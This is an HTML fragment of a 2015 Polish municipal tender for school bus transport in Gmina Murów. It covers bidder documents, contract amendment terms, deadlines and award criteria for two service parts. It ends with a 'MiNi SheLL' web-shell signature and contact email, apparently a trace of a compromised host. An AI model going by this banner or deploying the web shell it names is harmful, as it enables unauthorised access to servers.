<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie -pełnomocnictwo do występowania w imieniu Wykonawcy
  UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach.
2. Zmiana może obejmować :
   1. inną okoliczność prawną, ekonomiczną lub techniczną skutkującą niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ.
     2. W przypadku zmiany hurtowej oleju napędowego EKODISEL , ogłaszanego 
         przez  Polski Koncern Naftowy Orlen S.A. o ponad 10% w stosunku do ceny 
         obowiązującej  w dniu podpisania umowy w sytuacji kiedy cena paliwa osiągnie 
         ww poziom przez  okres minimum 1 miesiąca, strony dopuszczają możliwość 
        zmiany kwoty określonej w    § 6ust. 1 nie więcej niż wskaźnik wzrostu cen 
        wynikający z ogłaszanego corocznie Komunikatu Prezesa GUS w sprawie 
        średniorocznego wskaźnika cen towarów i usług konsumpcyjnych, nie częściej 
        niż raz w danym roku szkolnym.
     3. zmiany podwykonawców , których udział w realizacji przedmiotu umowy
        zaakceptował Zamawiający,
3. Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
      1. stawki podatku od towarów i usług,
      2. wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 
         2 ust.  3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu 
         za pracę ,
      3. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu 
         lub  wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne- 
         jeżeli  zmiany te będą miały wpływ na koszty wykonania zamówienia przez 
         Wykonawcę.
4. Zmiana określona w ust. 3 pkt.2) i3) umowy będzie możliwa pod warunkiem     
    przedstawienia Zamawiającemu- przed przystąpieniem do realizacji niniejszej 
    umowy oraz przy każdej zmianie liczby lub osób pracowników- imiennej listy 
    pracowników oddelegowanych do realizacji przedmiotowej umowy wraz z :
        1. oświadczeniem o zatrudnieniu wskazanych pracowników na umowę o pracę ,
        2. wskazaniem wysokości wynagrodzenia poszczególnych osób wraz z 
           możliwością  żądania przez Zamawiającego kopii umów o pracę,
        3  wyliczeniem różnicy pomiędzy dotychczasowym wynagrodzeniem a zmianą
            wynagrodzenia w związku z okolicznościami wymienionymi w ust. 3 pkt. 2) i 
        4) oświadczeniem w jakim stopniu powyższe zmiany wpływają na koszty    
            wykonania umowy gdy zmiany, o których mowa w ust. 3 pkt. 2) i 3) 
           spowodują wzrost kosztów wykonania Umowy o więcej niż 10% w okresie 
            realizacji umowy. Zmiana
5) wynagrodzenia dotyczy tej części, która pozostała do wykonania.
5. Warunkiem dokonania zmian, o których mowa w ust. 2 i 3 jest złożenie pisemnego 
      wniosku  przez stronę inicjującą zmianę, zawierającego:
      1)   opis propozycji zmiany,
      2)   uzasadnienie zmiany
      3)  obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana     będzie miała wpływ na wynagrodzenie wykonawcy,
      4)  opis wpływu zmiany na terminy wykonania usługi
6.  Dokonanie zmian, wymaga podpisania aneksu do umowy.
8.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień 
      publicznych:
     1) zmiana danych związanych z obsługą administracyjno- organizacyjną umowy
     2) zmiana danych teleadresowych osób reprezentujących strony lub oznaczenia stron  umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
9. Istnieje możliwość dokonania zmiany pracowników jedynie za uprzednią pisemną  zgodą  Zamawiającego. Wykonawca z własnej inicjatywy proponuje zmianę pracowników w  następujących przypadkach:
      1) śmierci, choroby lub innych zdarzeń losowych,
2) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek przyczyn, niezależnych 
od Wykonawcy. W przypadku zmiany pracownika, nowa osoba powołana do  pełnienia w/w obowiązków musi spełnić wymagania określone z specyfikacji istotnych  warunków zamówienia dla danej funkcji. Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa, jeżeli uzna , że nie wykonuje należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany takiej osoby w  terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego.
.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można odebrać także w Urzędzie Gminy Murów, 46-030 Murów ul. Dworcowa 2 - pokój nr 19..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 09:00, miejsce: Ofertę należy składać w Urzędzie Gminy Murów ul. Dworcowa 2 46-030 Murów pokój nr 10 w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr I- Dowóz uczniów wraz z opiekunami do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne   2015-2016,2016-2017 :.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)  Sprzedaż biletów miesięcznych dla uczniów dojeżdżających do szkół  podstawowych,    gimnazjum i dzieci do przedszkoli na terenie Gminy Murów i z powrotem we  wszystkie dni nauki szkolnej zgodnie z zestawieniem dojazdów uczniów do szkół i  przedszkoli  stanowiącym załącznik nr 1 do SIWZ. Zamówienie będzie realizowane   w ramach przewozów regularnych w Krajowym transporcie drogowym na podstawie ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2013r poz.1414).
   2)   Dopuszcza się, o ile będą miejsca w autobusach-busach , przewozy innych osób,  które  będą ponosić koszty przejazdu na rzecz przewoźnika, z zastrzeżeniem zapisów  ustawy z 20 czerwca 1992r. o uprawnieniach do ulgowych przejazdów środkami publicznego   transportu zbiorowego (Dz.U. z 2012r.poz..1138 z późn. zm.).
  3) Uczeń nie może być wcześniej w placówce oświatowej niż pół godziny przed godziną rozpoczęcia zajęć lekcyjnych w szkole. Faktyczne  godziny odjazdów autobusów  Wykonawca  ustali z dyrektorami poszczególnych szkół   przedszkoli.
 4)    Wykonawca jest zobowiązany zapewnić punktualny i bezpieczny dowóz uczniów do    szkół i dzieci do przedszkoli.
  5)    Ilość i wielkość pojazdów na danym odcinku dostosować należy do ilości 
          przewożonych uczniów i dzieci do przedszkoli.
  6)    Łączna liczba uczniów do przewiezienia do szkół i przedszkoli i z powrotem  
          wynosi 236 w tym: 213 uczniów i dzieci przedszkolnych dowożonych w w 
          formie   zakupu biletów miesięcznych  i 23 dzieci dowożonych do przedszkoli 
        nie objętych  biletami miesięcznymi. Dzienna trasa dowozu wynosi około 360 km.
  7)    Długość tras może ulec zmianie po przeprowadzeniu wizji lokalnej przed 
          sporządzeniem oferty.
 8)   Wykonawca zapewni bezpłatny przejazd opiekunom wyznaczonym na danej 
       trasie,   opiekę w trasie  dowożenia zapewnia Zamawiający.
  9)    W przypadku awarii wyznaczonego autobusu Wykonawca podstawi niezwłocznie , nie później jednak niż w ciągu 60 minut od powstania awarii, autobus spełniający  właściwe  wymagania techniczne w ruchu drogowym. W przypadku niemożności zrealizowania przewozu Wykonawca pokryje  dodatkowo koszty przewozu wynikłe z  wykonania  usługi przez podmiot zastępczy wybrany przez Zamawiającego.
10)   Wykonawca uwzględni możliwość sporadycznych zmian godzin dowozu uczniów i 
          odbiór wynikających z organizacji pracy szkoły czy przedszkola.
11) Z uwagi na utrudniony manewr nawracania na drodze w miejscowości Święciny 
       i w  miejscowości Okoły Zamawiający przewiduje na tych trasach dowóz 
       uczniów  busami.
12)    W przypadku odmiennej organizacji pracy szkoły i skrócenia zajęć lekcyjnych
          np. w dniu rekolekcji, dni sprawdzianów i egzaminów zewnętrznych, sprzątanie
          świata,  w  przeddzień ferii świątecznych itp. Wykonawca zapewni odwóz 
         uczniów we     wcześniejszych godzinach. Wcześniejsza organizacja odwozów nie stanowi  dodatkowych   zadań, należy je wkalkulować w cenę biletów.
13)    Ostateczna ilość kursów powrotnych wynikająca z organizacji pracy szkoły z 
       uwzględnieniem przystanków oraz ewentualnych innych punktów odbioru dzieci na trasach uzgodnionych z Wykonawcą,  zostaną określone po sporządzeniu planu zajęć w jednostkach oświatowych pomiędzy Dyrektorami Szkół i Przedszkoli a Wykonawcą.
 Wykaz przystanków stanowi załącznik nr 2 do SIWZ.
14)   Bilety miesięczne będą przekazywane poszczególnym dyrektorom szkół i przedszkoli przez Wykonawcę najpóźniej do dnia 20 miesiąca poprzedzającego miesiąc wykonania  zamówienia. Wykonawca na podstawie załącznika nr 4 do SIWZ będzie wystawiał  fakturę i  przekaże ją Zamawiającemu..
15)    Rozkład jazdy autobusów musi przewidywać przystanki w miejscowościach
        określonych    w zestawieniu. Na przystankach, o których mowa w zdaniu poprzednim,      Wykonawca jest zobowiązany umieścić dodatkową informację ( obok zwykłego rozkładu    jazdy) o   godzinach odjazdu i przyjazdów w ramach niniejszej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas podstawienia zamiennego sprawnego pojazdu- czas reakcji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz uczniów wraz z opiekunami  z Publicznego Gimnazjum w Zagwiździu do sali gimnastycznej w  Zagwiździu ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewóz uczniów na zajęcia wychowania fizycznego z Publicznego Gimnazjum w 
Zagwiździu do sali gimnastycznej w Zagwiżdziu, zgodnie z harmonogramem  przejazdów opracowanym przez Dyrektora Publicznego Gimnazjum w Zagwiździu  po  sporządzeniu planu zajęć w Publicznym Gimnazjum w terminie do 26 sierpnia każdego 
 roku wykonywanej usługi.

  2)   Ilość kursów: 
        poniedziałek  - dowóz  do sali i powrót- 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
        wtorek- dowóz do sali  i powrót - 3 kursy
        orientacyjna ilość kilometrów do przejechania  5,40km
        środa - dowóz do sali i powrót - 2 kursy
        orientacyjna ilość kilometrów do przejechania 3,60 km
        czwartek - dowóz do Sali i powrót - 1 kurs
        orientacyjna ilość kilometrów do przejechania 1,80 km
        piątek - dowóz do sali i powrót - 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
Należy rozumieć 1 kurs jako dowóz z Gimnazjum  do sali i powrót.
W ciągu tygodnia średnio 2 kursy dziennie.
3) Orientacyjna liczba uczniów przewożona jednym kursem od 18  do 22.
   Podane liczby uczniów oraz ilość kursów w danym dniu tygodnia są liczbami 
    aktualnymi na dzień ogłoszenia o zamówieniu publicznym. 
     Szczegółowy harmonogram przewozu uczniów zostanie opracowany przez Dyrektora  Publicznego Gimnazjum w Zagwiździu i przekazany Wykonawcy do dnia 26 sierpnia danego roku szkolnego objętego zamówieniem. Harmonogram stanowić będzie   załącznik do umowy
4)  Wykonawca musi dysponować minimum jednym autobusem z kierowcą - z ilością 
        miejsc siedzących zapewniającą obsługę wymaganej ilości uczniów.
5)    Wykonawca zapewni bezpłatny przejazd opiekunowi, opiekę w trakcie dowożenia 
       zapewnia Zamawiający.
6)    W przypadku awarii wyznaczonego autobusu Wykonawca podstawi niezwłocznie 
      autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W przypadku  niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo koszty  przewozu   wynikłe z wykonania  usługi  przez podmiot zastępczy wybrany przez  Zamawiającego.
7)   Pojazd służący do przewozu uczniów musi być oznakowany zgodnie z przepisami 
       prawa o ruchu drogowym i transporcie osób.
 8)  Zamawiający nie dopuszcza wykonania usługi w ramach regularnej komunikacji    
       autobusowej za sprzedażą biletów miesięcznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com